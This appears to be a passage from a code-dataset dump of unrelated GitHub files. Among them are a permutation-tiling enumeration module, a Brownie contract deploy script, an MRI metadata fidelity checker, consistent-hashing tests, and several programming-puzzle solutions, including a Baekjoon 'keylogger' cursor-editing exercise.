queue.extend(self.tiling.cells_in_row(cell[1]))\n queue.extend(self.tiling.cells_in_col(cell[0]))\n\n def _visted_cells_aligned(self, cell, visited):\n \"\"\"\n Return the cells that are in visited and in the same row or column as\n `cell`.\n \"\"\"\n row_cells = self.tiling.cells_in_row(cell[1])\n col_cells = self.tiling.cells_in_col(cell[0])\n return (c for c in visited if (c in row_cells or c in col_cells))\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-locals\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n if self.tiling.extra_parameters:\n raise NotImplementedError(\n \"Not implemented monotone verified with extra parameters.\"\n )\n try:\n start = next(\n c\n for c in self.tiling.active_cells\n if not self.tiling.is_monotone_cell(c)\n )\n except StopIteration:\n start = next(iter(self.tiling.active_cells))\n start_basis = self.tiling.cell_basis()[start][0]\n start_reqs = [[p] for p in self.tiling.cell_basis()[start][1]]\n start_tiling = self.tiling.from_perms(\n obstructions=start_basis, requirements=start_reqs\n )\n start_gf = start_tiling.get_genf()\n F = start_gf.subs({x: x * self._cell_variable(start)})\n visited = set([start])\n for cell in self._cell_tree_traversal(start):\n interleaving_cells = self._visted_cells_aligned(cell, visited)\n substitutions = {\n scv: scv * self._tracking_var\n for scv in map(self._cell_variable, interleaving_cells)\n }\n F_tracked = F.subs(substitutions)\n minlen, maxlen = self._cell_num_point(cell)\n if maxlen is None:\n F = self._interleave_any_length(F_tracked, cell)\n if minlen > 0:\n F -= self._interleave_fixed_lengths(F_tracked, cell, 0, minlen - 1)\n else:\n F = self._interleave_fixed_lengths(F_tracked, cell, minlen, maxlen)\n visited.add(cell)\n F = simplify(\n F.subs({v: 1 for v in F.free_symbols if v != x})\n ) # type: ignore[operator]\n # A simple test to warn us if the code is wrong\n if __debug__:\n lhs = taylor_expand(F, n=6)\n rhs = [len(list(self.tiling.objects_of_size(i))) for i in range(7)]\n assert lhs == rhs, f\"Bad genf\\n{lhs}\\n{rhs}\"\n return F\n\n @staticmethod\n def _cell_variable(cell):\n \"\"\"\n Return the appropriate variable to track the number of point in the\n given cell.\n \"\"\"\n return var(f\"y_{cell[0]}_{cell[1]}\")\n\n def _interleave_any_length(self, F, cell):\n \"\"\"\n Return the generating function for interleaving any number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n cell_var = self._cell_variable(cell)\n gap_filler = 1 / (1 - x * cell_var)\n return F.subs({self._tracking_var: gap_filler}) * gap_filler\n\n def _interleave_fixed_lengths(self, F, cell, min_length, max_length):\n \"\"\"\n Return the generating function for interleaving between min_point and\n max_point (both included) number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n return sum(\n self._interleave_fixed_length(F, cell, i)\n for i in range(min_length, max_length + 1)\n )\n\n def _interleave_fixed_length(self, F, cell, num_point):\n \"\"\"\n Return the generating function for interleaving num_point\n number of point of a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n new_genf = self._tracking_var**num_point * F\n for i in range(1, num_point + 1):\n new_genf = diff(new_genf, self._tracking_var) / i\n new_genf *= self._cell_variable(cell) ** num_point\n new_genf *= x**num_point\n return new_genf.subs({self._tracking_var: 1})\n\n def _cell_num_point(self, cell):\n \"\"\"\n Return a pair of integer `(min, max)` that describe the possible\n number of point in the cell. If the number of point is unbounded,\n `max` is None.\n\n We assume that the cell is monotone\n \"\"\"\n obs, reqs = self.tiling.cell_basis()[cell]\n ob_lens = sorted(map(len, obs))\n assert ob_lens[0] == 2, \"Unexpected obstruction\"\n assert len(reqs) <= 1, \"Unexpected number of requirement\"\n if len(obs) == 1:\n maxlen = None\n elif len(obs) == 2:\n maxlen = ob_lens[1] - 1\n else:\n raise RuntimeError(\"Unexpected number of obstructions\")\n if not reqs:\n minlen = 0\n elif len(reqs) == 1:\n minlen = len(reqs[0])\n else:\n raise RuntimeError(\"Unexpected number of requirements\")\n return minlen, maxlen\n\n\nclass DatabaseEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a tilings that are in the database.\n\n There is not always a specification for a tiling in the database but you can always\n find the generating function and the minimal polynomial in the database.\n \"\"\"\n\n API_ROOT_URL = \"https://api.permpal.com\"\n all_verified_tilings: FrozenSet[bytes] = frozenset()\n num_verified_request = 0\n\n @classmethod\n def load_verified_tiling(cls):\n \"\"\"\n Load all the verified tiling in the attribute `all_verified_tilings` of\n the class.\n\n That speeds up the verification test.\n \"\"\"\n if not DatabaseEnumeration.all_verified_tilings:\n uri = f\"{cls.API_ROOT_URL}/all_verified_tilings\"\n response = requests.get(uri, timeout=10)\n response.raise_for_status()\n compressed_tilings = map(bytes.fromhex, response.json())\n cls.all_verified_tilings = frozenset(compressed_tilings)\n\n def _get_tiling_entry(self):\n \"\"\"\n Retrieve the tiling entry from the database. Returns None if the tiling\n is not in the database.\n \"\"\"\n key = self.tiling.to_bytes().hex()\n search_url = f\"{DatabaseEnumeration.API_ROOT_URL}/verified_tiling/key/{key}\"\n r = requests.get(search_url, timeout=10)\n if r.status_code == 404:\n return None\n r.raise_for_status()\n return r.json()\n\n def verified(self):\n \"\"\"\n Check if a tiling is verified.\n\n After a 100 checks it loads all the saved tiling from the database to\n speed up future requests.\n \"\"\"\n DatabaseEnumeration.num_verified_request += 1\n if DatabaseEnumeration.all_verified_tilings:\n return self.tiling.to_bytes() in DatabaseEnumeration.all_verified_tilings\n if DatabaseEnumeration.num_verified_request > 10:\n DatabaseEnumeration.load_verified_tiling()\n return self._get_tiling_entry() is not None\n\n def get_genf(self, **kwargs) -> Any:\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n return sympify(self._get_tiling_entry()[\"genf\"])\n","repo_name":"PermutaTriangle/Tilings","sub_path":"tilings/algorithms/enumeration.py","file_name":"enumeration.py","file_ext":"py","file_size_in_byte":14317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32380297932","text":"from brownie import *\nimport os\n\ndef deploy_backedby(deployer):\n from0 = {'from': deployer}\n profiles = BBProfiles.deploy(from0)\n posts = BBPosts.deploy(profiles, from0)\n tiers = BBTiers.deploy(profiles, from0)\n subfactory = BBSubscriptionsFactory.deploy(profiles, tiers, deployer, from0)\n\n gasOracle = DebugGasOracle.deploy(from0)\n subfactory.setGasOracle(gasOracle, from0).wait(2)\n \n tokens = [\n {'name': \"USDC\", 'address': \"0x8f7116CA03AEB48547d0E2EdD3Faa73bfB232538\"},\n {'name': \"USDT\", 'address': \"0x0afF29eeCf746EC239C8DA3E8e630F46FCaBC48e\"},\n {'name': \"DAI\", 'address': \"0xd393b1E02dA9831Ff419e22eA105aAe4c47E1253\"},\n {'name': \"TUSD\", 'address': \"0x3c75bd0e659b8bd426b3b9a1d93b75bb9c97de10\"}\n ]\n\n for i, token in enumerate(tokens):\n tx = subfactory.deploySubscriptions(token['address'], from0)\n tx.wait(2)\n token['subaddress'] = subfactory.getDeployedSubscriptions(token['address'])\n #remove gas change for live\n #subfactory.setSubscriptionFee(token['address'], 1, from0)\n\n print(\"profiles\", profiles)\n print(\"posts\", posts)\n print(\"tiers\", tiers)\n print(\"subfactory\", subfactory)\n print(\"gas oracle\", gasOracle)\n\n \n for i, token in enumerate(tokens):\n print(token['name'], token['address'], \"=>\", token['subaddress'])\n\n\ndef main():\n \n if(os.environ.get(\"DEPLOYER_PRIVATEKEY\") != None):\n deployer = accounts.add(os.environ.get(\"DEPLOYER_PRIVATEKEY\"))\n elif(len(accounts) > 0):\n deployer = accounts[0]\n\n if(deployer.balance() >= 1e17):\n deploy_backedby(deployer)","repo_name":"backedby/v1-contracts","sub_path":"scripts/josh/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39241896127","text":"from math import log10\nfrom time import time\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): \n b += 1\n return b\n\nif __name__==\"__main__\":\n start = time()\n print(f\"\\nAnswer: { main() }\")\n print(f\"Time Taken: { time() - start }\\n\")\n\n \n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30421383437","text":"from collections import deque\n\nN,M = map(int,input().split())\n\ngraph = []\n\nfor i in range(N):\n k = list(input())\n for j in range(M):\n if k[j] == 'B':\n b = [i,j]\n if k[j] == 'R':\n r = [i,j]\n graph.append(k)\n\n\nvisited = [[[[False]*M for i in range(N)] for i in range(M) ] for i in range(N)]\n\ndef move(x,y,dx,dy):\n c = 0\n\n while graph[x+dx][y+dy] != '#' and graph[x][y] != 'O':\n x +=dx\n y +=dy\n c+=1\n return x,y,c \n\n\ndef bfs():\n dx = [1,-1,0,0]\n dy = [0,0,1,-1]\n q = deque()\n q.append((r[0],r[1],b[0],b[1],1))\n visited[r[0]][r[1]][b[0]][b[1]] = True\n\n while q:\n rx,ry,bx,by,cnt = q.popleft()\n if cnt > 10 :\n break\n \n for i in range(4):\n nrx,nry,rc = move(rx,ry,dx[i],dy[i])\n nbx,nby,bc = move(bx,by,dx[i],dy[i])\n if graph[nbx][nby] != 'O':\n if graph[nrx][nry] == 'O':\n print(1)\n return \n if nrx == nbx and nry == nby :\n if rc > bc :\n nrx -=dx[i]\n nry -=dy[i]\n else:\n nbx -=dx[i]\n nby -=dy[i]\n if visited[nrx][nry][nbx][nby] == False:\n visited[nrx][nry][nbx][nby] = True\n q.append((nrx,nry,nbx,nby,cnt+1))\n \n print(0)\n return \n\nbfs()\n\n \n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/graphs/13459.py","file_name":"13459.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4475884207","text":"# PURPOSE\n# This file reads a json template file and constructs a dictionary of\n# field-value pairs. When passed a relevant fidelity file, it compares the\n# empirical field values in it against this dictionary and returns which tests\n# it passed and which it failed\n# Author: Austin Marcus (axm6053@psu.edu)\n\n# Assumptions being made:\n##Questionable:\n## The target json sub-elemnt name should exactly match oart of the file name\n#\t# however, this may be inconsistent. Best match is with the SeriesDescription element\n## a \"-\" in json fields is equivalent to a \"_\" --> should remove this assumption. made because of mismatch with SeriesDescription.\n#\n##Valid:\n## values from json template that are a single element vector (e.g. [5]) are equivalent to the single element (data from experimental json files is not bracketed) --> valid\n## if a list (dim or pixdim) is longer in the experimental data than the list given in the template json, only look at up till the length of the template list\n\nimport json\nimport os\nimport sys\nfrom . import helper\n\nTOL = .01\nmanual_verify = False\n\n# this class organizes the data associated with a single file analysis: a comparison of a single file against the json template file\nclass fileAnalysis:\n\n\tdef __init__(self, filename, fileSuffix, task, scanType, subID, runNum, fidelityChecks):\n\t\tself.filename = filename # the filename, not the path\n\t\tself.fileSuffix = fileSuffix # the suffix of the file (json or nii)\n\t\tself.task = task # the task done during the scan. (rest_post, ...)\n\t\tself.scanType = scanType # the type of scan done. (bold or sbref)\n\t\tself.subID = subID\n\t\tself.fidelityChecks = fidelityChecks # array of fidelity_check objects\n\t\tself.runNum = runNum # run number for the current task\n\t\n\t# INPUT:\n\t#\tother: a fileAnalysis object\n\t# OUTPUT:\n\t#\tTrue if the only thing different between this fileAnalysis and the other is their file suffix. that is, they represent the same scan, just one is the nifti file and the other is the json file\n\t#\tFalse otherwise\n\tdef sameScan(self, other):\n\t\tif self.task == other.task and self.scanType == other.scanType and self.subID == other.subID and helper.getUpperPathFromPath(self.filename) == helper.getUpperPathFromPath(other.filename) and self.runNum == other.runNum:\n\t\t\treturn True\n\t\treturn False\n\n\tdef print(self):\n\t\tprint(\"Scan type: \" + self.task + \"\\nFile type: \" + self.scanType + \"\\nFile suffix: \" + self.fileSuffix + \"\\nSubject Id: \" + str(self.subID) + \"\\nRun number\" + str(self.runNum))\n\t\tprint(\"\\t\" + str(self.fidelityChecks))\n\t\tprint()\n\n# fed an experimental json file and compares against values\nclass fidelityTemplate:\n\t\n\tdef __init__(self, jsonFileName):\n\t\t#print(\"in fidelityTemplate\")\n\t\tf = open(jsonFileName, \"r\")\n\n\t\t# convert raw json to dictionary\n\t\tself.data = json.load(f)\n\t\tfor dict1 in self.data:\n\t\t\tfor key1 in self.data[dict1]:\n\t\t\t\tfor key2 in self.data[dict1][key1]:\n\t\t\t\t\tself.data[dict1][key1][key2] = self.interpret(self.data[dict1][key1][key2])\n\t\n\t# takes as input a string, and attempts to convert it to a number\n\t# if given a list with one element, will break it out of the list as well\n\tdef interpret(self, data):\n\n\t\tif type(data) == list and len(data) == 1: # breaks out single element list\n\t\t\tdata = data[0]\n\t\t\n\t\tif type(data) == list:\n\t\t\t# iterate on each\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = self._interpret(data[i])\n\n\t\telse: # just do it once\n\t\t\tdata = self._interpret(data)\n\n\t\treturn data\n\n\tdef _interpret(self, data):\n\t\ttry: # tries to convert to number\n\t\t\tdata = float(data)\n\t\texcept: \n\t\t\t#data = data.replace(\"-\",\"_\") # assuming it must be a string at this point if not a number\n\t\t\tpass\n\n\t\treturn data\n\t\t\n\t# decides how to get data from given file\n\tdef getExData(self, exFileName, fileSuffix):\n\t\t# select wether comparing to json file or nifti file \n\t\tif fileSuffix == \"json\":\n\t\t\t\n\t\t\tf = open(exFileName, \"r\")\n\t\t\texData = json.load(f)\n\n\t\telif fileSuffix == \"nifti\": \n\t\t\texData = {}\n\t\t\traw = os.popen(\"fslhd \" + str(exFileName)).read()\n\t\t\tfor line in raw.split(\"\\n\"):\n\t\t\t\tline = line.split(\"\\t\")\n\t\t\t\tlineParts = list(filter(lambda x: x != \"\\t\" and x != \"\", line))\n\t\t\t\tif len(lineParts) != 2:\n\t\t\t\t\tcontinue\n\t\n\t\t\t\tlineParts[1] = self.interpret(lineParts[1])\n\t\t\n\t\t\t\t# consider aggregating specific fields into array to match format of desired json\n\t\t\t\tspecs = [\"dim\", \"pixdim\"]\n\t\t\t\tmatched = False\n\t\t\t\tfor i in specs:\n\t\t\t\t\tif i == lineParts[0][:len(i)]: #match\n\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t# if first one, initialize\n\t\t\t\t\t\tif exData.get(i) == None:\n\t\t\t\t\t\t\texData[i] = []\n\t\t\t\t\t\texData[i].append(lineParts[1])\n\t\t\t\t\t\t\t\n\t\t\t\tif not matched:\n\t\t\t\t\texData[lineParts[0]] = lineParts[1]\n\n\t\treturn exData\n\n\t# returns the scan type (rest_pre, rest_post) by extraction from filename\n\t# returns file type (json or nifti) by checking file suffix\n\t# returns subject ID number\n \t # return run number from filename\n\tdef parseFileName(self, filename):\n\t\tsubID = helper.getSubjectIdOfPath(filename)\n\t\ttask = helper.getTaskFromFilename(filename)\n\t\trunNum = helper.getRunNumberFromFilename(filename)\n\t\tif task == \"T1w\":\n\t\t\tscanType = \"---\"\n\t\telse:\n\t\t\tscanType = helper.getScanType(filename)\n\t\tfileSuffix = helper.getFileSuffix(filename)\n\t\t\n\t\treturn task, fileSuffix, subID, scanType, runNum\n\n\tdef guessIsKey(self, key, guess):\n\t\tkey_mod = key.replace('_', '').replace('-', '').lower()\n\t\tguess = guess.replace('_', '').replace('-', '').lower()\n\n\t\treturn key_mod == guess\n\n\tdef isTaskInTemplate(self, task):\n\t\t# check if task is specified in template file\n\t\ttry:\n\t\t\tself.data[task]\n\t\t\treturn True\n\t\texcept:\n\t\t\tfor key in list(self.data.keys()):\n\t\t\t\tif self.guessIsKey(key, task):\n\t\t\t\t\treturn key\n\t\t\treturn False\n\n\t# pass file name to compare object. \n\t# checks that target fields match fields in the data file\n\t# returns a 3-tuple: (task, subID, output)\n\t# \t\toutput: array of 2-tuples: (field, [0,1])\n\tdef compareToFile(self, exFileName):\n\t\t# parse filename to get scan and file type\n\t\ttask, fileSuffix, subID, scanType, runNum = self.parseFileName(exFileName)\n\t\tif task == None:\n\t\t\treturn None\n\n\t\tret = self.isTaskInTemplate(task)\n\t\tif ret == False:\n\t\t\treturn None\n\t\telif ret != True:\n\t\t\ttask = ret\n\t\n\t\t# task name in template file has _sbref for sbref files\n\t\tif scanType == \"sbref\":\n\t\t\ttaskTemp = task + \"_sbref\"\n\t\telse:\n\t\t\ttaskTemp = task\n\n\t\t# get the data from the file\n\t\texData = self.getExData(exFileName, fileSuffix)\n\t\t# select which set of fidelity checks applies to this file\n\t\tchecks = self.data[taskTemp][fileSuffix]\n\t\t\n\t\toutput = []\n\t\tif (manual_verify):\n\t\t\tprint(\"file: \" + exFileName)\n\t\tfor key in checks: # attempting to check only based on fields present in template file; assumption that data files should have a superset\n\t\t\tif (manual_verify):\n\t\t\t\tprint(\"key: \" + key + \"\\n\\ttemplt: \" + str(checks[key]) + \"\\n\\tactual: \", end=\"\")\n\t\t\tcur_check = helper.fidelity_check(key)\n\t\t\t# check if key in data file\n\t\t\ttry:\n\t\t\t\texData[key]\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(exData[key], end=\"\\n\")\n\t\t\texcept:\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"not present\", end=\"\\n\")\n\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(\"not present\"))\n\t\t\t\toutput.append(cur_check)\n\t\t\t\tcontinue\n\n\t\t\tequal, indicies = self.compareObjects(exData[key], checks[key])\n\t\t\tif equal:\n\t\t\t\tcur_check.passCheck()\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t0\", end=\"\")\n\t\t\telse:\n\t\t\t\t# if it differed by an element in a list, pass the index\n\t\t\t\tif indicies != None:\n\t\t\t\t\t# build string: \"/@:...\"\n\t\t\t\t\tresult = \"\"\n\t\t\t\t\tfor i in indicies:\n\t\t\t\t\t\tresult += (\"%s%s%s%s%d\" % (str(checks[key][i]), helper.fidelity_check.diff_delim, str(exData[key][i]), helper.fidelity_check.addr_char, i))\n\t\t\t\t\t\tresult += \":\"\n\t\t\t\t\tresult = result[:-1]\n\n\t\t\t\t\tcur_check.failCheck(result)\n\t\t\t\telse:\n\t\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(exData[key]))\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t1\", end=\"\")\n\n\t\t\tif (manual_verify):\n\t\t\t\tprint()\n\t\t\toutput.append(cur_check)\n\n\t\tif (manual_verify):\n\t\t\tprint()\n\n\t\t# sort output by key name to ensure consistency\n\t\toutput = sorted(output, key=lambda x: x.getName()) \n\t\treturn fileAnalysis(exFileName, fileSuffix, task, scanType, subID,runNum, output)\n\n\t# assuming objects have been interpreted at this point\n\t# takes two objects, that is, a piece of text, a number, or an array of either and tests their equality\n\t# these objects are the values of the fields from the template json and the experimental data\n\tdef compareObjects(self, exOb, templateOb):\n\n\t\t# compare each element of a list\n\t\tif type(exOb) == list and type(templateOb) == list:\n\t\t\tindicies = []\n\t\t\tfor i in range(len(templateOb)):\n\t\t\t\tif self._compareObjects(exOb[i], templateOb[i]) == False:\n\t\t\t\t\tindicies.append(i)\n\t\t\n\t\t\tif len(indicies) == 0:\n\t\t\t\treturn (True, None)\n\t\t\telse:\n\t\t\t\treturn (False, indicies)\n\t\t\t\n\t\telif type(exOb) == list or type(templateOb) == list:\n\t\t\treturn (False, None)\n\t\telse:\n\t\t\treturn (self._compareObjects(exOb, templateOb), None)\n\n\tdef _num_in_tol(self, num1, num2):\n\t\treturn num1 < num2 + TOL and num1 > num2 - TOL\n\n\tdef _compareObjects(self, exOb, templateOb):\n\n\t\tif type(templateOb) == str and type(exOb) != str:\n\t\t\t# get number in template object\n\t\t\tnum = float(templateOb[:-1])\n\t\t\tif templateOb[-1] == \"+\":\n\t\t\t\tif self._num_in_tol(num, exOb) or num < exOb:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\telif type(templateOb) == str and type(exOb) == str:\n\t\t\tif exOb == templateOb:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn exOb.replace(\"-\",\"_\") == templateOb.replace(\"-\",\"_\")\n\t\telse:\n\t\t\treturn self._num_in_tol(exOb, templateOb)\n\t\t\t\t\n","repo_name":"UNCDEPENdLab/fmriprep_pipeline","sub_path":"mri_fidelity_checks/mri_fidelity_checks/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20546713552","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('9958E83F5A6C4B6D30.jpg', 0)\n\nprint(img.shape)\n\nx, y = img.shape\n\nprint(x)\nprint(y)\n\n_x = 64\n_y = 64\nk = 0\n\n# 이미지 하나씩 자르기\nfor i in range(0, y, _y):\n for j in range(0, x, _x):\n k = k + 1\n if k == 5:\n testimg = img[i:i+_x, j:j+_y]\n cv2.imshow('testimage',testimg)\n\n\n\n\ncv2.imshow('image',img)\ncv2.waitKey(0)","repo_name":"donaldaq/opencv","sub_path":"codes/cropped.py","file_name":"cropped.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27389979402","text":"from collections import Counter\nfrom statistics import mean\n\nfrom consistent_hash import ConsistentHash, Node\nfrom faker import Faker\n\n\ndef test_get_node_of_key_successfully():\n # given\n consistent_hash = ConsistentHash(\n nodes=[\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ],\n )\n faker = Faker()\n\n n_data = 10\n for _ in range(n_data):\n\n # when\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n\n # then\n assert node.id in [\"1\", \"2\", \"3\"]\n\n\ndef test_get_node_of_key_should_divide_the_keys_evenly():\n # given\n nodes = [\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ]\n consistent_hash = ConsistentHash(nodes=nodes)\n faker = Faker()\n node_ids = []\n\n # when\n n_data_per_node = 100\n n_data = n_data_per_node * len(nodes)\n for _ in range(n_data):\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n node_ids.append(node.id)\n\n # then\n counter = Counter(node_ids)\n print(counter)\n error_rate = 0.20\n lower_bound = n_data_per_node - int(n_data_per_node * error_rate)\n upper_bound = n_data_per_node + int(n_data_per_node * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert counter[\"1\"] in expected_values\n assert counter[\"2\"] in expected_values\n assert counter[\"3\"] in expected_values\n\n\ndef test_consistent_hash_do_after_add_a_node_successfully():\n n_test = 100\n n_diffs = []\n faker = Faker()\n n_data = 100\n initial_data = [faker.email() for _ in range(n_data)]\n n_nodes = 3\n nodes = [Node(id=str(i)) for i in range(1, n_nodes + 1)]\n for _ in range(n_test):\n consistent_hash = ConsistentHash(nodes)\n initial_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n initial_key_to_node[key] = node\n\n consistent_hash.add_node(Node(id=\"4\"))\n after_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n after_key_to_node[key] = node\n\n n_diff = 0\n for key in initial_data:\n if initial_key_to_node[key] != after_key_to_node[key]:\n n_diff += 1\n n_diffs.append(n_diff)\n\n error_rate = 0.35\n expected_diff = int(len(initial_data) / 4)\n lower_bound = expected_diff - int(expected_diff * error_rate)\n upper_bound = expected_diff + int(expected_diff * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert int(mean(n_diffs)) in expected_values\n","repo_name":"heumsi/implementing-system-design-interview","sub_path":"05-design-consistent-hashing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5144811998","text":"# when writing a function you can define a default value\r\n# if an argument for a parameter is provided in the functional call python uses the argument value\r\n\r\ndef describe_pet( pet_name, animal_type = \"dog\"):\r\n \"\"\"Display information about a pet\"\"\"\r\n print(\"\\nI have a \" + animal_type + \".\")\r\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\r\n\r\ndescribe_pet(pet_name= \"wes\")\r\ndescribe_pet(animal_type= \"turtle\", pet_name= \"terry the turtle\") # in order to change animal_type it first must ...\r\n# ... be defined","repo_name":"JamCrumpet/Lesson-notes","sub_path":"Lesson 7 function/7.8_default_values.py","file_name":"7.8_default_values.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9530466881","text":"\nfrom multiprocessing import Pool\n\np = Pool(4)\n\n#make local directories if they don't exist\ndef make_dir(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\n#get all subdirs\n\nimport os, glob\nsrcdir = \"xml\"\ndstdir = \"/media/backup/aps/xml/\"\n\nsrcfolders = []\nfor root, dirs, files in os.walk(srcdir):\n\t#make folder copies at the destination so they exist\n\tsrcfolders.extend(dirs)\n\tbreak\n\nfor f in srcfolders[0]:\n\tnewroot = dstdir + f\n\t#make_dir(newroot)\n\tdstpattern = \"xml/\" + f + \"/*.xml\"\n\tsource_files = glob.glob(dstpattern)\n\tdest_files = [i.replace(srcdir+\"/\", dstdir) for i in source_files]\n\t\n\n#for each directory, copyfile in parallel \np.map(f, args=(srcfolders, dstfolders))\n","repo_name":"mjlavin80/aps-elastic-scripts","sub_path":"copy-json.py","file_name":"copy-json.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5371398706","text":"# 키로거\n# https://www.acmicpc.net/problem/5397\n# Stack 2개 이용\n\n\ndef getKey(s):\n beforeCursor = []\n afterCursor = []\n for token in s:\n if token == '>':\n if afterCursor:\n beforeCursor.append(afterCursor.pop())\n elif token == '<':\n if beforeCursor:\n afterCursor.append(beforeCursor.pop())\n elif token == '-':\n if beforeCursor:\n beforeCursor.pop()\n else:\n beforeCursor.append(token)\n return \"\".join(beforeCursor) + \"\".join(reversed(afterCursor))\n\n\ntestCaseNum = int(input())\n\nfor _ in range(testCaseNum):\n s = input()\n key = getKey(s)\n print(key)\n","repo_name":"YimJiYoung/Daily-DataStructure-Algorithm","sub_path":"DataStructure/Stack_Queue/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20159703720","text":"with open(\"7/rules.txt\") as f:\n rules = f.readlines()\n\n\ndef get_containers(color: str):\n res = []\n for rule in rules:\n if color in rule:\n rule = rule.strip().split(\" \")\n res.append(rule[0] + \" \" + rule[1])\n return res\n\n\n# def check(color: str):\n# result = list(set(get_containers(color)))\n# print(\"Res: \", result)\n# if len(result) == 0:\n# return 0\n# else:\n# num = 0\n# for res in result:\n# if res == color:\n# num -= 1\n# continue\n# num += check(res)\n# return len(result) + num\n\ndef check(color: str):\n print(\"Color: \", color)\n result = list(set(get_containers(color)))\n result.remove(color)\n print(\"Result: \", result)\n\n if len(result) < 1:\n return []\n\n temp = []\n for res in result:\n temp.extend(set(check(res)))\n result.extend(temp)\n return list(set(result))\n\n\nres = check(\"shiny gold\")\nprint(\"Result: \", len(res))\n","repo_name":"vaerl/advent-of-code-2020","sub_path":"7/rules-1.py","file_name":"rules-1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5062810333","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef solve(N: int, M: int, C: \"List[str]\", D: \"List[str]\", P: \"List[int]\"):\n d = {}\n for i in range(M):\n d[D[i]] = P[i + 1]\n ans = 0\n for cc in C:\n if cc not in d:\n ans += P[0]\n else:\n ans += d[cc]\n print(ans)\n\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n C = [next(tokens) for _ in range(N)] # type: \"List[str]\"\n D = [next(tokens) for _ in range(M)] # type: \"List[str]\"\n P = [int(next(tokens)) for _ in range(M + 1)] # type: \"List[int]\"\n solve(N, M, C, D, P)\n\nif __name__ == '__main__':\n main()\n","repo_name":"K53/atcoder-workspace","sub_path":"abc308/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33554381112","text":"# pylint: disable=unused-variable\nfrom aiohttp import web\nimport pytest\n\n\n@pytest.mark.parametrize(\n ['params'],\n [\n ({'lines': ['first', 'second'], 'logins': ['user_1']},),\n ({'logins': ['user_2']},),\n ({'lines': ['first', 'new']},),\n ({},),\n ],\n)\nasync def test_chatterbox_stats(web_app_client, params, mock_chatterbox_py3):\n @mock_chatterbox_py3('/v1/users/statuses', prefix=True)\n def handler(request):\n assert request.query.getall('lines', []) == params.get('lines', [])\n assert request.query.getall('logins', []) == params.get('logins', [])\n return 